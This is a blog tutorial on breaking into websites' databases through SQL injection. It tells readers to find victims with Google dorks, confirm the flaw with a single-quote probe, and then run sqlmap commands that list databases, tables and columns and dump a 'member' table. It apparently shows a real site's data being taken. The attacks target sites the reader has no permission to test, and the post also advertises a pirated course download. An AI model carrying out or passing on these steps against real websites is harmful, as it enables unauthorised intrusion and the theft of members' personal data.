How to Hack Website Database 2019 (UPDATED)

How to Hack Website Database 2019 (UPDATED)

Hello, guys in today’s article we are going to see how hackers hack the database of any vulnerable website (How to Hack Website Database 2019 (UPDATED)) , so there are many other ways for hacking the database of website but in today’s post we are going to see how to hack website database using SQL Injection.

we can hack the website’s database using two different techniques

1.)  manual way (performing attack manually bypassing arguments in URL )

2.)  automatic injection (SQLMAP)

but in this article, I am going to use SQLMAP tool if you are beginner then go with the manual way if you can’t find manual way comment below I will try to explain in another article.

So let’s start

What is SQL injection?

  • SQL injection type of attack which is used to extract website database’s  data without credentials
  • in other words, we can say accessing all personal data of website without credentials of the website
  • we can do many things with SQL injection
    • hacking websites (defacement, etc)
    • extracting data from the database
    • login bypass

Why SQL injection is so common all over the internet?

  • actually, SQL Injection occurs due to improper filtration of user input on the server-side
  • so hackers act as a user and send malicious SQL Queries and developer does not properly filter the user input so it will elevate the SQL Injection
  • in 2019 still, SQL Injection vulnerability exists cause every day new developers are creating  new websites and web app but many of them are a newbie developer so they make these type of mistakes

Step 1:

First, find SQL injection vulnerable website, for that, you can use google dorks

  • GOOGLE Dorks for SQL injection:

    • home.php?cat=
    • view_items.php?id=
    • product.php?sku=
    • main.php?id=

find vulnerable websites using above dorks if you don’t know how to use dorks comment below I will write the article on it

Step 2:

after finding websites check whether a website is vulnerable to SQL injection or not for that put the single quote ( ‘ ) at the end of the URL and hit enter if there is any kind of SQL error then it’s vulnerable else find another website (Example:- https://www.example.com/index.php?id=1′ )

if you get the result similar to below image then it’s vulnerable to SQL injection

Example:

sql_injection

 

Cick here to Downlaod certified etical hacking v10 books :- CERTIFIED ETHICAL HACKING COURSE V10 DOWNLOAD

Step 3:

Now we got a vulnerable website I assume you also got one so let’s begin to open your terminal and type (” sqlmap -u ‘https://target-website.pk/index.php?id=1’ –dbs”) without double-quotes for fetching databases of the specified website, we did not perform the vulnerability checking stage in sqlmap, cause we manually verified is there SQL injection vulnerability is present in site or not

Example:

The command for fetching database

How to Hack Website Database sqlmap scanning

 

Fetched Database

How to Hack Website Database database hacking

Step 4:

We got database (“dailypak_dailypak”, “information_schema”) names as shown in the above images now we try to fetch available tables inside that database

we are going to fetch tables from ‘dailypak_dailypak’ database for that type following command (” sqlmap -u ‘https://target-website.pk/index.php?id=1’ –tables -D dailypak_dailypak “) without double quotes and press enter

Example:

Fetching Tables

How to Hack Website Database fetching tables

Fetched Tables

fetched tables sqlmap

You may also like: python programming

Step 5:

here we got all the tables that are available in the database now let’s find columns that are available in tables

for that type following command (” sqlmap -u ‘https://target-website.com/index.php?id=1’ –columns -D dailypak_dailypak  -T  member “) without double quotes and press enter

Example:

Fetching Columns

How to Hack Website Database fetch column sqlmap

 

Columns Fetched

How to Hack Website Database fetch column sql map

Step 6:

now we got required columns and we can dump all data that stored inside this table’s columns so let’s dump (fetch) it

type the following command (” sqlmap -u ‘https://target-site.com/index.php?id=1’ –dump -D dailypak_dailypak  -T  member ” ) without double quotes and hit enter it will take some time and then display the result and automatically store in “.csv”  file you can find a path in the bottom of the terminal

Example:

Hacked Database Data

How to Hack Website Database database hacked using sqlmap

 

Path of the saved database file

How to Hack Website Database sqlmap save path

 

thank you d=friends for reading How to Hack Website Database 2019 (UPDATED)

so friends here’s the tutorial on how to hack website database subscribe to notification for future articles let us know your thoughts on this article by commenting thanks for reading see you again

You May Also Like

About the Author: TheCoder

10 Comments

  1. Hi, somebody help me with database latest techniques, want to apply for a job as experienced Ethical Hacker for financial domain. Could someone help attacks on financial databases how to secure them.
    Thanks,

Leave a Reply

Your email address will not be published. Required fields are marked *